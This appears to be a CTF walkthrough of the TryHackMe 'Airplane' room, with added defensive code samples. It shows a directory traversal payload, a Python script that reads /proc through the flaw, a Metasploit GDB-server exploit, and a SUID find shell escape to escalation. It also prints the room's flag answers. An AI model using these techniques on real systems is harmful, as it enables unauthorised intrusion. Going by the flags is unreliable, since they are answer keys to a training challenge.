We covered a CTF scenario where we started with nmap scanning, followed by enumeration of the web application running on port 8000, where we discovered a directory traversal vulnerability that allowed us to read sensitive files such as /etc/passwd. Using Python, we identified the process listening on port 6048, a port we had found during the nmap scan. The service turned out to be GDB server, and we used Metasploit to exploit it and gain a Meterpreter shell. Privilege escalation was achieved horizontally first, by looking for binaries with the SUID bit set, and then to root using ruby. This was part of the TryHackMe Airplane CTF room.
Web Application Enumeration
We know from the scanning phase that the webserver runs on port 8000, so by visiting and testing the page we discover its vulnerability to directory traversal.
If you use the URL below in the request, you will be able to view the password file on Linux:
http://airplane.thm:8000/page.html=../../../etc/passwd
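The root cause of the traversal above is a page parameter that is joined to the web root without checking where the result ends up. The following is an added example (not code from the room or from the walkthrough) that places the flawed lookup beside a hardened one; the web root /var/www/html is an assumption chosen for the demo, and the checks are purely lexical:

```python
import posixpath
from pathlib import PurePosixPath
from typing import Optional

# Constructed web root for this demo; the real application's root is unknown.
WEB_ROOT = PurePosixPath("/var/www/html")


def resolve_page_unsafe(page: str) -> PurePosixPath:
    """Mirror the flaw abused above: the ?page= value is joined to the web root
    and normalised, but nothing checks that the result is still under the root,
    so '../' sequences (or an absolute path) walk straight out of it."""
    return PurePosixPath(posixpath.normpath(posixpath.join(str(WEB_ROOT), page)))


def resolve_page_safe(page: str) -> Optional[PurePosixPath]:
    """Hardened form: reject NUL bytes, normalise, then require that the result
    is still inside WEB_ROOT. Returns None for anything that escapes."""
    if "\x00" in page:
        return None
    candidate = PurePosixPath(posixpath.normpath(posixpath.join(str(WEB_ROOT), page)))
    try:
        candidate.relative_to(WEB_ROOT)  # raises ValueError when not under WEB_ROOT
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    for p in ("index.html", "../../../etc/passwd", "/etc/passwd"):
        print(f"{p!r:24} unsafe -> {resolve_page_unsafe(p)}   safe -> {resolve_page_safe(p)}")
```

Because PurePosixPath never touches the filesystem, this catches only lexical escapes; a real server should additionally resolve the candidate on disk (Path.resolve) and repeat the containment check, since a symlink inside the root can still point outside it.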
By reading /proc/net/tcp through the same flaw, we get the list of active TCP sockets. Using the documented column layout of that file, we can match the columns with their values to extract the local address, the local port and the remote port.
We find that port 6048 (hex 17A0) also has an active, unknown service, so we set our sights on finding out what is behind it.
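The columns of /proc/net/tcp are hex-encoded, which is why 6048 shows up as 17A0. The parser below is an added example, not part of the original walkthrough; it runs over a constructed sample in the same layout (not a capture from the room's machine) and decodes addresses, ports, state and the socket inode that tools such as ss and lsof use to map a listener back to a process:

```python
from typing import Dict, List, Optional

# TCP state codes as used in the 'st' column of /proc/net/tcp.
TCP_STATES = {
    0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
    0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
    0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING",
}

# Constructed sample in the layout of /proc/net/tcp (not captured from the
# room). Row 1 is a listener on 0x17A0 = 6048, like the one discussed above.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 26548 1 0000000000000000 100 0 0 10 0
   1: 00000000:17A0 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 26571 1 0000000000000000 100 0 0 10 0
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17422 1 0000000000000000 100 0 0 10 0
   3: 0F02000A:1F40 0102000A:C1A2 01 00000000:00000000 00:00000000 00000000  1000        0 30011 1 0000000000000000 20 4 30 10 -1
"""


def hex_to_ipv4(hex_addr: str) -> str:
    """The address is 4 bytes printed as 8 hex digits in host byte order; on
    x86 that is little-endian, so the octets come out reversed."""
    return ".".join(str(b) for b in reversed(bytes.fromhex(hex_addr)))


def parse_endpoint(field: str):
    addr, port = field.split(":")
    return hex_to_ipv4(addr), int(port, 16)


def parse_proc_net_tcp(text: str) -> List[Dict]:
    entries = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        local_ip, local_port = parse_endpoint(fields[1])
        remote_ip, remote_port = parse_endpoint(fields[2])
        entries.append({
            "local_ip": local_ip, "local_port": local_port,
            "remote_ip": remote_ip, "remote_port": remote_port,
            "state": TCP_STATES.get(int(fields[3], 16), fields[3]),
            "uid": int(fields[7]),
            "inode": int(fields[9]),  # socket inode, resolvable via /proc/<pid>/fd links
        })
    return entries


def listening_ports(text: str) -> List[int]:
    return sorted(e["local_port"] for e in parse_proc_net_tcp(text) if e["state"] == "LISTEN")


def entry_for_port(text: str, port: int) -> Optional[Dict]:
    for e in parse_proc_net_tcp(text):
        if e["local_port"] == port and e["state"] == "LISTEN":
            return e
    return None


if __name__ == "__main__":
    for e in parse_proc_net_tcp(SAMPLE_PROC_NET_TCP):
        print(f'{e["state"]:12} {e["local_ip"]}:{e["local_port"]} uid={e["uid"]} inode={e["inode"]}')
    print("listening:", listening_ports(SAMPLE_PROC_NET_TCP))
```

On a host you administer, ss -ltnp gives the same view with the owning PID attached; the uid and inode columns are what let you spot a listener on an unexpected port that is owned by an ordinary user account rather than a service account, which is the condition the room's hidden GDB server would exhibit.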
Using Python to Uncover the Hidden Process
Below is the Python script used to reveal the name of the process listening on port 6048:
import requests

def read_file(base_url, path):
    # Read a file through the directory-traversal flaw in the ?page= parameter.
    file_url = f"{base_url}/?page=../../../../{path}"
    try:
        response = requests.get(file_url, timeout=10)
        if response.status_code == 200:
            return response.text
        else:
            return None
    except Exception as e:
        print(f"Error reading {path}: {e}")
        return None

def find_pid_by_port(base_url, port):
    # Walk candidate PIDs and return the first whose command line mentions the port.
    for pid in range(1, 5000):  # Adjust the range based on the expected number of PIDs
        cmdline_path = f"proc/{pid}/cmdline"
        cmdline = read_file(base_url, cmdline_path)
        if cmdline:
            if str(port) in cmdline:
                return pid
    return None

# Example usage
base_url = 'http://airplane.thm:8000'
port = '6048'
pid = find_pid_by_port(base_url, port)
if pid:
    cmdline = read_file(base_url, f"proc/{pid}/cmdline")
    status = read_file(base_url, f"proc/{pid}/status")
    print(f'PID using port {port}: {pid}')
    print(f'Command line: {cmdline}')
    print(f'Status: {status}')
else:
    print(f'No process found using port {port}')
The name of the process is: GDB server
Exploitation with Metasploit
We used the Metasploit module exploit/multi/gdb/gdb_server_exec to perform the exploitation and get a Meterpreter shell.
Linux Privilege Escalation
First we performed horizontal privilege escalation from user hudson to user carlos by looking for binaries owned by carlos with the SUID bit set:
find / -user carlos -perm -u=s 2>/dev/null
Then we run:
/usr/bin/find . -exec /bin/sh -p \; -quit
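The SUID hunt above is the same check an administrator runs to audit a host. The following is an added example, not code from the room or the walkthrough: it lists setuid files under a root the way find -perm -u=s does, then compares the list against a recorded baseline so that a newly appeared setuid binary (such as the find copy abused here) stands out. The demo tree it builds is constructed in a temporary directory and is an assumption of this example:

```python
import os
import stat
import tempfile
from typing import List, Tuple

SuidEntry = Tuple[str, int]  # (path, owner uid)


def find_suid(root: str) -> List[SuidEntry]:
    """Walk `root` and return every regular file whose setuid bit is set,
    together with its owner uid. Same idea as `find / -perm -u=s 2>/dev/null`;
    entries are lstat'ed so symlinks are reported as links, not followed."""
    hits: List[SuidEntry] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry, the 2>/dev/null case
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


def new_since_baseline(current: List[SuidEntry], baseline: List[SuidEntry]) -> List[SuidEntry]:
    """Entries present now but absent from a previously recorded baseline:
    a setuid binary that was not there before is worth investigating."""
    known = set(baseline)
    return [entry for entry in current if entry not in known]


def make_demo_tree() -> Tuple[str, str]:
    """Build a constructed tree with one setuid file and one plain file so the
    audit can be exercised without touching the real filesystem."""
    root = tempfile.mkdtemp(prefix="suid-audit-demo-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    setuid_file = os.path.join(bindir, "demo-setuid")
    plain_file = os.path.join(bindir, "demo-plain")
    for path in (setuid_file, plain_file):
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")
    os.chmod(setuid_file, 0o4755)  # rwsr-xr-x: setuid bit set
    os.chmod(plain_file, 0o755)    # rwxr-xr-x: no setuid bit
    return root, setuid_file


if __name__ == "__main__":
    demo_root, _expected = make_demo_tree()
    found = find_suid(demo_root)
    for path, uid in found:
        print(f"setuid uid={uid} {path}")
    print("new versus empty baseline:", new_since_baseline(found, []))
```

Run it against / as root on a production host and store the output; on later runs, anything new_since_baseline reports (a setuid copy of find owned by a user account, for instance) is a finding, since a legitimate package update rarely adds setuid bits to user-owned files.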
Later down the road, you can run the command below:
sudo -l
You will find that carlos can run /usr/bin/ruby /root/*.rb as root via sudo.
Check out the video below for a detailed explanation.
Room Answers | TryHackMe Airplane CTF
What is user.txt?
eebfca2ca5a2b8a56c46c781aeea7562
What is root.txt?
190dcbeb688ce5fe029f26a1e5fce002
Finally, completing the TryHackMe "Airplane" room allowed for a practical investigation of cybersecurity methods. Every stage of the penetration testing process, from using Nmap for preliminary reconnaissance to leveraging SUID misconfigurations and Local File Inclusion (LFI) vulnerabilities, provided insightful learning experiences. Through escalation of privileges to the carlos account and, eventually, root.txt access, I reaffirmed the importance of meticulous exploitation and a complete study of the system.
Video Walkthrough | TryHackMe Airplane CTF